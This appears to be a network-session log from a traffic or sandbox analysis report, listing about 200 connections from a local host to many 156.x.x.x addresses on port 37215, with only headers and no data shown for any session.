                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18955192.168.2.1535116156.253.153.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18956192.168.2.1540486156.80.107.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18957192.168.2.1554932156.47.78.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18958192.168.2.1545144156.128.233.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18959192.168.2.1538276156.237.234.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18960192.168.2.1534686156.188.162.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18961192.168.2.1552776156.82.228.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18962192.168.2.1554078156.199.130.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18963192.168.2.1534448156.64.63.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18964192.168.2.1534548156.22.115.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18965192.168.2.1556402156.122.157.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18966192.168.2.1534320156.11.50.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18967192.168.2.1544184156.207.51.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18968192.168.2.1544898156.252.53.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18969192.168.2.1560848156.43.164.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18970192.168.2.1553642156.98.200.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18971192.168.2.1541614156.161.50.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18972192.168.2.1541120156.79.151.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18973192.168.2.1538794156.209.41.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18974192.168.2.1535832156.121.87.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18975192.168.2.1538242156.137.42.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18976192.168.2.1536462156.108.160.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18977192.168.2.1550354156.1.23.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18978192.168.2.1557234156.219.147.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18979192.168.2.1549680156.158.247.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18980192.168.2.1537810156.191.253.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18981192.168.2.1536070156.234.192.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18982192.168.2.1537832156.210.216.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18983192.168.2.1550690156.133.246.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18984192.168.2.1534280156.123.93.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18985192.168.2.1537928156.98.204.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18986192.168.2.1547600156.54.34.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18987192.168.2.1537758156.225.199.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18988192.168.2.1546940156.242.138.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18989192.168.2.1538814156.26.180.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18990192.168.2.1537256156.114.153.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18991192.168.2.1544614156.134.53.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18992192.168.2.1548104156.147.98.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18993192.168.2.1546368156.196.34.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18994192.168.2.1551092156.61.223.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18995192.168.2.1556024156.197.225.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18996192.168.2.1533340156.65.16.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18997192.168.2.1532996156.62.119.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18998192.168.2.1547546156.116.245.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18999192.168.2.1537392156.181.245.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19000192.168.2.1560876156.117.35.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19001192.168.2.1558302156.126.109.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19002192.168.2.1551742156.27.106.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19003192.168.2.1551218156.21.42.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19004192.168.2.1535594156.30.181.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19005192.168.2.1553176156.215.9.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19006192.168.2.1560390156.27.136.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19007192.168.2.1544574156.254.56.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19008192.168.2.1535310156.164.218.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19009192.168.2.1535510156.146.141.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19010192.168.2.1536264156.130.102.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19011192.168.2.1536680156.221.65.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19012192.168.2.1534660156.96.164.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19013192.168.2.1559466156.177.26.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19014192.168.2.1560500156.54.1.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19015192.168.2.1536650156.161.221.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19016192.168.2.1553642156.59.66.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19017192.168.2.1560810156.33.112.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19018192.168.2.1543232156.147.182.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19019192.168.2.1550810156.127.62.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19020192.168.2.1538720156.72.24.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19021192.168.2.1547420156.102.11.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19022192.168.2.1549428156.70.205.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19023192.168.2.1548440156.138.32.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19024192.168.2.1548404156.36.44.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19025192.168.2.1543268156.41.133.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19026192.168.2.1540882156.121.80.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19027192.168.2.1557748156.87.47.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19028192.168.2.1558228156.253.185.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19029192.168.2.1548068156.5.189.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19030192.168.2.1547116156.184.143.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19031192.168.2.1545046156.143.137.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19032192.168.2.1553422156.135.123.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19033192.168.2.1550252156.214.111.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19034192.168.2.1553310156.46.130.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19035192.168.2.1544332156.24.49.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19036192.168.2.1545376156.154.130.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19037192.168.2.1535330156.60.74.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19038192.168.2.1547482156.185.173.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19039192.168.2.1550646156.206.45.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19040192.168.2.1553572156.35.64.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19041192.168.2.1536118156.16.227.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19042192.168.2.1551958156.106.159.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19043192.168.2.1555132156.183.226.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19044192.168.2.1533818156.10.41.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19045192.168.2.1542078156.64.175.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19046192.168.2.1534386156.204.103.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19047192.168.2.1545406156.102.202.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19048192.168.2.1533572156.51.78.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19049192.168.2.1547008156.66.187.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19050192.168.2.1545130156.247.89.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19051192.168.2.1539162156.244.90.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19052192.168.2.1541696156.218.35.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19053192.168.2.1549704156.72.141.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19054192.168.2.1556242156.24.180.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19055192.168.2.1533534156.224.249.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19056192.168.2.1540904156.160.250.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19057192.168.2.1552246156.4.105.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19058192.168.2.1549022156.251.205.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19059192.168.2.1554036156.180.93.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19060192.168.2.1539872156.47.97.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19061192.168.2.1536804156.227.251.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19062192.168.2.1555296156.247.224.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19063192.168.2.1548982156.74.103.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19064192.168.2.1546244156.136.68.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19065192.168.2.1536856156.234.143.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19066192.168.2.1548308156.217.82.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19067192.168.2.1541250156.76.218.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19068192.168.2.1546466156.248.22.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19069192.168.2.1549344156.83.51.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19070192.168.2.1534128156.140.67.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19071192.168.2.1535948156.10.212.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19072192.168.2.1547388156.84.78.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19073192.168.2.1551972156.155.86.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19074192.168.2.1549292156.189.136.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19075192.168.2.1547512156.123.238.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19076192.168.2.1554000156.43.77.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19077192.168.2.1547980156.68.67.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19078192.168.2.1536318156.124.83.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19079192.168.2.1542316156.251.152.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19080192.168.2.1548496156.99.167.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19081192.168.2.1536056156.179.143.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19082192.168.2.1540412156.12.49.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19083192.168.2.1541572156.250.185.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19084192.168.2.1559556156.64.12.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19085192.168.2.1557162156.133.71.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19086192.168.2.1555548156.96.208.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19087192.168.2.1543840156.49.206.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19088192.168.2.1556462156.5.57.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19089192.168.2.1538044156.67.206.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19090192.168.2.1538320156.167.210.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19091192.168.2.1548412156.72.189.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19092192.168.2.1547332156.171.212.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19093192.168.2.1546324156.177.198.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19094192.168.2.1552878156.178.131.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19095192.168.2.1559902156.208.179.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19096192.168.2.1554404156.166.44.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19097192.168.2.1534552156.186.18.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19098192.168.2.1542568156.68.81.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19099192.168.2.1554930156.232.190.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19100192.168.2.1544290156.152.76.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19101192.168.2.1559708156.223.179.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19102192.168.2.1541586156.75.180.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19103192.168.2.1534896156.47.92.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19104192.168.2.1555186156.211.78.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19105192.168.2.1544328156.145.178.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19106192.168.2.1551334156.28.45.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19107192.168.2.1537222156.16.140.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19108192.168.2.1538592156.128.15.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19109192.168.2.1549466156.124.160.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19110192.168.2.1548490156.101.128.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19111192.168.2.1546654156.98.159.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19112192.168.2.1547520156.110.250.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19113192.168.2.1554132156.72.94.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19114192.168.2.1546092156.186.178.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19115192.168.2.1559942156.18.127.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19116192.168.2.1549604156.218.232.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19117192.168.2.1554054156.81.184.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19118192.168.2.1555138156.141.20.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19119192.168.2.1550788156.166.62.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19120192.168.2.1558312156.18.15.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19121192.168.2.1544612156.162.210.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19122192.168.2.1534848156.113.250.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19123192.168.2.1541368156.126.208.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19124192.168.2.1546256156.67.221.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19125192.168.2.1544774156.65.16.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19126192.168.2.1552194156.174.49.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19127192.168.2.1550276156.218.246.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19128192.168.2.1545182156.213.200.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19129192.168.2.1550212156.119.101.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19130192.168.2.1544216156.74.253.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19131192.168.2.1556592156.159.55.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19132192.168.2.1553214156.18.188.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19133192.168.2.1534728156.233.127.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19134192.168.2.1541134156.5.235.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19135192.168.2.1549206156.199.250.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19136192.168.2.1549542156.85.122.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19137192.168.2.1542958156.190.124.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19138192.168.2.1542050156.191.198.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19139192.168.2.1555680156.165.10.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19140192.168.2.1559368156.155.197.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19141192.168.2.1536654156.138.108.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19142192.168.2.1546948156.112.21.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19143192.168.2.1551968156.21.180.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19144192.168.2.1551860156.129.127.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19145192.168.2.1537858156.111.21.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19146192.168.2.1538084156.131.252.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19147192.168.2.1553554156.29.11.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19148192.168.2.1559022156.1.168.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19149192.168.2.1539164156.66.7.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19150192.168.2.1549140156.215.92.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19151192.168.2.1560014156.203.219.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19152192.168.2.1547486156.67.2.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19153192.168.2.1559676156.229.14.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19154192.168.2.1538470156.96.68.11737215
                                                                            TimestampBytes transferredDirectionData


